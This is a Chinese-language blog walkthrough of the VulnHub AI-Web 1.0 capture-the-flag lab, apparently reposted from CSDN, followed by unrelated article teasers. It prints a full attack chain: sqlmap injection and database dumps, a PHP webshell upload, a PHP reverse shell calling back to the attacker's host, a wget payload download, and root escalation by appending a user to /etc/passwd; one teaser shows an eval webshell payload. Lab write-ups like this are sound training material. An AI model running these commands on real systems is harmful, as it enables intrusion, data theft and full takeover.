VulnhubAI-web 1.0靶机详解

时间：2024-08-02 12:53:23浏览次数：10

标签：sqlmap web 1.0 VulnhubAI 47.135 192.168 http se3reTdir777 php

项目地址

https://www.vulnhub.com/entry/ai-web-1,353/

实验过程

将下载好的靶机导入到VMware中，设置网络模式为NAT模式，然后开启靶机虚拟机

使用nmap进行主机发现，获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知DC-8的一个ip地址为192.168.47.135

扫描Ai-Web1.0的操作系统，端口及对应服务

nmap -A -p- 192.168.47.135

发现开放80端口

在浏览器访问http://192.168.47.135

对网站进行目录和文件扫描

dirb http://192.168.47.135

出现robots.txt文件

进入网站进行查询

尝试访问发现没有权限

使用dirb进行扫描

dirb http://192.168.47.135/m3diNf0/
dirb http://192.168.47.135/se3reTdir777/

结果可知dirb http://192.168.47.135/m3diNf0/有一个info.php页面
尝试访问

dirb http://192.168.47.135/se3reTdir777/有一个index.php页面
尝试访问

发现是查询页面考虑sql注入

输入’页面报错

存在sql注入

使用Burpsuite进行一个抓包，得到注入点

使用sqlmap进行扫描

sqlmap -u  "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" -dbs

sqlmap -u  "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" -D aiweb1 --tables

sqlmap -u  "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" -D aiweb1 -T user --columns

sqlmap -u  "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" -D aiweb1 -T user -C id --dump

没有什么有用信息了
尝试–os-shell

首先获取绝对路径

进入info.php查找

找到了路径 /home/www/html/web1x443290o2sdf92213/
需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合
它的绝对目录为/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

使用–os-shell

sqlmap -u  "http://192.168.47.135/se3reTdir777/index.php" -data "uid=123&Operation=Submit" --level=3 --os-shell

成功进入shell

上传一句话木马

在sqlmap文件夹里写一个一句话木马文件

在sqlmap开个终端

sqlmap -u "http://192.168.47.135/se3reTdir777/index.php" --data "uid=123&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

发现一句话木马文件移进来了

蚁剑连接

打开蚁剑

进行连接

http://192.168.47.135/se3reTdir777/uploads/1.php

可以正常访问

这里蚁剑要拿到他的终端，右击打开终端

nc反弹

在 kali 写⼀个 php ⽂件

<?php
$sock=fsockopen("192.168.47.129",6666);
exec("/bin/bash -i <&3 >&3 2>&3");
?>

在Kali开启一个端口服务

python -m http.server 7777

到 os-shell 命令行，用wget 命令下载

wget http://192.168.47.129:7777/3.php

开启监听

nc -lvvp 6666

在–os-shell 执行木马文件

php 3.php

监听成功

提权

查看当前用户

在 Linux 系统中我们要向手动生成⼀个密码可以采用opensll passwd来生成⼀个密码作为用户账号的密码。
Linux系统中的密码存放在 /etc/shadow 文件中，并且是以加密的方式存放的，根据加密方式的不同，所产生的加密后的密码的位数也不同。

:::info
openssl passwd的作用是用来计算密码hash的，目的是为了防止密码以明文的形式出现。
:::

使用openssl 创建⼀个用户

openssl passwd -1 -salt h 123456

:::info
openssl passwd 参数用户名密码
:::

-1：表示采用的是MD5加密算法。
-salt：指定salt值，不使用随机产生的salt。在使用加密算法进行加密时，即使密码⼀样，salt不⼀样，所计算出来的hash值也不⼀样，除非密码⼀样，salt值也⼀样，计算出来的hash值才⼀样。salt为8字节的字符串。

将用户写入/etc/passwd文件中

echo 'h:$1$h$DcmWd6ffV7pl4.0.1QBQ40:0:0:root:/root:/bin/bash'>>/etc/passwd

使用cat查看是否写入

cat /etc/passwd

成功写入

切换用户

⽤脚本提升为交互式shell，然后切换用户

python -c 'import pty;pty.spawn("/bin/bash")'
su h

寻找flag

cd /
ls
cd root
ls
cat flag.txt

标签：sqlmap,web,1.0,VulnhubAI,47.135,192.168,http,se3reTdir777,php
From： https://blog.csdn.net/weixin_62457642/article/details/140859930

基于web的史料采购系统的设计与实现
目录1绪论1.1选题背景与意义1.2国内外研究现状2系统分析2.1.1技术可行性分析2.1.2经济可行性分析2.1.3社会可行性分析2.1.3操作可行性分析2.2系统流程分析2.2.1数据新增流程2.2.2数据删除流程2.3系统功能分析2.3.1功能性分析2.3.2非功能性分析......
NewStarCTF WEEK4|WEB PharOne
首先进入后查看源码进入class.php看见unlike很明显是一个phar反序列化的利用我们有两种选择一一句话木马<?phpclassFlag{public$cmd;}$a=newFlag();$a->cmd="echo\"<?=@eval(\\\$_POST['a']);\">/var/www/html/1.php";$phar=newPhar("......
web小游戏开发：拼图（完）完整代码展示
web小游戏开发：拼图（完）关于不规则图形拼图的讨论CANVASdrawImage踩坑第一个坑，canvas内置画布的宽高和实际显示的宽高没有关联第二个坑，来源图片的尺寸切割不规则图形完整代码htmlcssjs关于不规则图形拼图的讨论在开始制作这个拼图之前，我们就已......
如何使用 Flask 或 Django 创建 Web 应用
Flask和Django是Python中最受欢迎的两个Web框架，它们各有优点，适用于不同的应用场景。一、使用Flask创建Web应用1.1Flask简介Flask是一个轻量级的Web框架，以其简洁、易用和灵活著称。它遵循“微框架”的设计理念，只提供核心功能，其余的功能可以通过扩展和第三方库来实现。这使......
Android 11.0 Launcher修改density禁止布局改变功能实现
1.前言在11.0的系统rom定制化开发中，在关于Launcher3的定制化功能中，在有些功能需要要求改变系统原有的density屏幕密度，这样就会造成Launcher3的布局变化，所以就不符合要求，接下来就来看下如何禁止改变density造成Launcher3布局功能改变的实现2.Launcher修改density禁止布局改......
基于WEB的仓库管理系统的设计与实现
点击下载源码基于WEB的仓库管理系统的设计与实现摘要仓库物品的管理是与我们的日常生活息息相关的一个重大问题。随着我国经济飞速的发展，改革开放的不断深入，企业要想在激烈的市场竞争中立于不败之地，要想继续的发展与生存，没有现代化的管理方式与方法是万万不行的，仓库管......
JavaWeb（10） HTTP协议
一、HTTP协议1.定义 HTTP超文本传输协议(HTTP-HyperTexttransferprotocol)，是一个属于应用层的面向对象的协议，由于其简捷、快速的方式，适用于分布式超媒体信息系统。它于1990年提出，经过十几年的使用与发展，得到不断地完善和扩展。它是一种详细规定了浏览器......
Web中间件漏洞提权
Web中间件漏洞提权什么是Web中间件是一类提供系统软件和应用软件之间的连接，便于软件各部件之间的沟通的软件，应用软件可以借助中间件在不同的技术架构之间共享信息和资源。中间件位于客户机服务器的操作系统之上，管理着计算资源和网络通信。中间件=平台+通信一、IIS中间件1、IIS......
Vulnhub靶机：JANGOW_ 1.0.1
目录前言：一、安装虚拟机Jangow：1.0.1靶机二、Web部分前言：难度：简单，本文使用VirtualBox打开，下载地址：https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova一、安装虚拟机Jangow：1.0.1靶机1.选择下载的Jangow:1.0.1的文件路径。不要放C盘，不要放C盘。放在自己能记住......
【nginx网站部署】【nginx部署网站】【linux-nginx】静态页面部署静态网站部署 nginx
============================================第一步：安装：===============================1、安装：sudoapt-getinstallnginx 输入y2、测试是否成功： sudonginx-t 输出： nginx:theconfigurationfile/etc/nginx/nginx.confsyntaxisok nginx:config......